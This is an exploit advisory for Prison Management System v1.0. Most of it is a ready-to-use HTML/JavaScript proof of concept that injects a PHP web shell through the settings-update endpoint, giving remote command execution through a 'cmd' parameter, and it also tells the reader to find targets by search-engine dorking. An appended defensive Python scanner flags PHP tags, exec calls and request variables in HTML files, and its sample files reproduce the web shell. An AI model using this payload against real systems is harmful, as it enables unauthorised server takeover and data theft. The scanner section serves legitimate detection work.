=============================================================================================================================================
| # Title     : Prison Management System v1.0 PHP code injection Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip
=============================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] This HTML page is designed to create a file and inject PHP code.

[+] Save the payload as poc.html

[+] On line 13, the key in 'content[welcome]' names the file you want to create; it will be created with an HTML extension.
    On the same line, put the payload that suits you.

[+] Set your target url

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> PHP code injection Tool</title>

    <script>
        async function sendRequest() {
            const url = document.getElementById('url').value;

            const postData = {
                'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`
            };

            try {
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded'
                    },
                    body: new URLSearchParams(postData).toString()
                });

                if (response.ok) {
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';
                } else {
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;
                }
            } catch (error) {
                document.getElementById('result').innerText = 'Error making request: ' + error.message;
            }
        }
    </script>
</head>
<body>
    <h1>Injection Tool</h1>
    <form onsubmit="event.preventDefault(); sendRequest();">
        <label for="url">Enter URL:</label>
        <input type="text" id="url" name="url" required>
        <button type="submit">Submit</button>
    </form>
    <pre id="result"></pre>
</body>
</html>

Greetings to :
============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr
============================================================
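
Added example (not part of the original advisory or the vendor's code): because the injected content lands in a file with an HTML extension, a defender can sweep the application's content files for PHP open tags, execution calls and request-controlled input. The directory to scan is supplied by the operator; the function names and the sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# PHP open tags: "<?php" and the short echo tag "<?=" (case-insensitive).
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# Calls that execute OS commands or evaluate code.
EXEC_CALL = re.compile(
    rb"\b(system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(", re.IGNORECASE)
# Superglobals that carry attacker-controlled request data.
REQUEST_VAR = re.compile(rb"\$_(REQUEST|GET|POST|COOKIE)\b")


def scan_html_for_php(root):
    """Return [(relative_path, severity, reasons)] for .html files holding PHP."""
    findings = []
    for path in sorted(Path(root).rglob("*.html")):
        data = path.read_bytes()
        if not PHP_TAG.search(data):
            continue  # static HTML only, nothing to report
        reasons = ["php-open-tag"]
        calls = sorted({m.group(1).lower().decode() for m in EXEC_CALL.finditer(data)})
        if calls:
            reasons.append("exec-call:" + ",".join(calls))
        if REQUEST_VAR.search(data):
            reasons.append("request-input")
        # All three signals together match the pattern shown in this advisory.
        severity = "high" if len(reasons) == 3 else "medium"
        findings.append((path.relative_to(root).as_posix(), severity, reasons))
    return findings


def demo():
    """Run the scanner over constructed sample files (not taken from a real host)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "about.html").write_text("<h1>About</h1><p>Visiting hours: 9-5</p>")
        (root / "welcome.html").write_text(
            '<?php if(isset($_REQUEST["cmd"])){ system($_REQUEST["cmd"]); die; }?>')
        (root / "notice.html").write_text("<p>Total: <?= 1 + 1 ?></p>")
        return scan_html_for_php(root)


if __name__ == "__main__":
    for rel, severity, reasons in demo():
        print(f"{severity:6} {rel}: {', '.join(reasons)}")
```

Any hit deserves review, since content files meant to hold static HTML have no reason to contain PHP tags at all.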